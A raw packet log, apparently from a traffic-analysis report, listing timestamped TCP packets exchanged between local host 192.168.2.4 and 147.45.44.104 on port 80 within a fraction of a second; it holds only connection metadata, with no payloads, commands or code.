Oct 8, 2024 03:30:55.117592096 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117608070 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117616892 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117625952 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117651939 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117662907 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117667913 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117686987 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117697001 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117705107 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117722988 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117731094 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117762089 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.118011951 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118027925 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118041992 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118057966 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118072987 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.118074894 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118103027 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.118472099 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118525028 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.118525028 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118541956 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118575096 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118583918 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.118590117 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118607044 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118623018 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118638039 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.118640900 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118658066 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.118683100 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.118695021 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119045973 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119123936 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119138002 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119172096 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119180918 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119206905 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119223118 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119223118 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119240046 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119263887 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119276047 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119292021 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119296074 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119308949 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119332075 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119334936 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119353056 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119355917 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119368076 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119380951 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119393110 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119412899 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119415045 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119430065 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119446993 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119455099 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119488001 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119512081 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119535923 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119573116 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119575977 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119592905 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119609118 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119632006 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119659901 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119674921 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119690895 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119697094 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119726896 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119735956 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119780064 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119796038 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119810104 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119821072 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119832039 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119848967 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119857073 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119873047 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119887114 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119894028 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119905949 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119924068 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.119957924 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.119997025 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120011091 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.120012999 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120029926 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120044947 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120049000 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.120083094 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.120121002 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120136976 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120153904 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120168924 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120176077 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.120186090 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120201111 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120213032 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.120218039 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120234013 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120244980 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.120251894 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120265961 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120269060 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.120302916 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.120476007 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120596886 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.120635033 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.120773077 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.121001959 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.121017933 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.121052980 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.121139050 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.121186018 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.121253014 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.121436119 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.121453047 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.121476889 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.123344898 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.123419046 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.123513937 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.123529911 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.123544931 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.123558998 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.123569965 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.123574972 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.123593092 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.123593092 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.123634100 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.206799030 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.206820011 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.206835985 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.206871033 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.206888914 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.206903934 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.206919909 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.206938028 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.206958055 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.206958055 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.207020998 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208192110 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208230972 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208247900 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208273888 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208276987 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208291054 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208307028 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208313942 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208347082 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208390951 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208419085 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208437920 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208453894 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208461046 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208473921 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208489895 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208559990 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208576918 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208590984 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208599091 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208607912 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208623886 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208631039 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208643913 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208661079 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208693027 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208709002 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208729029 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208730936 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208755016 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208767891 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208770037 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208785057 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208801031 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208816051 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208826065 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208844900 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208920956 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208940029 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208956003 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208964109 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.208973885 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208990097 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.208995104 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.209007025 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209034920 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209036112 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.209052086 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209069014 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209074974 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.209085941 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209100962 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209106922 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.209139109 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.209161997 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209197044 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209212065 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209235907 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.209278107 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209294081 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209310055 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209325075 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.209393978 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.209419966 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209438086 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209518909 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.209764957 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209865093 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.209913015 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210025072 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210041046 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210056067 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210083008 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210083961 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210103989 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210119963 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210129023 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210138083 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210160017 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210213900 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210230112 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210244894 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210258007 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210262060 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210278034 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210283041 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210311890 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210319042 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210329056 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210344076 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210361004 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210376978 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210376978 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210403919 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210514069 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210530043 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210545063 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210560083 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210560083 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210576057 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210587025 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210592985 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210609913 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210618019 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210627079 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210647106 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210653067 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210664988 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210684061 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210688114 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210724115 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210756063 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210772991 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210788012 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210803986 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210817099 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210820913 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210855007 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210894108 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210908890 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210922956 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210941076 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210942030 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.210958958 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.210963011 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.211003065 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.211046934 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.211064100 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.211078882 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.211095095 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.211107969 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.211111069 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.211127996 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.211143017 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.211143017 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
                                                  Oct 8, 2024 03:30:55.211164951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211169958 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211182117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211210966 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211263895 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211281061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211296082 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211309910 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.211312056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.211329937 CEST8049730147.45.44.104192.168.2.4
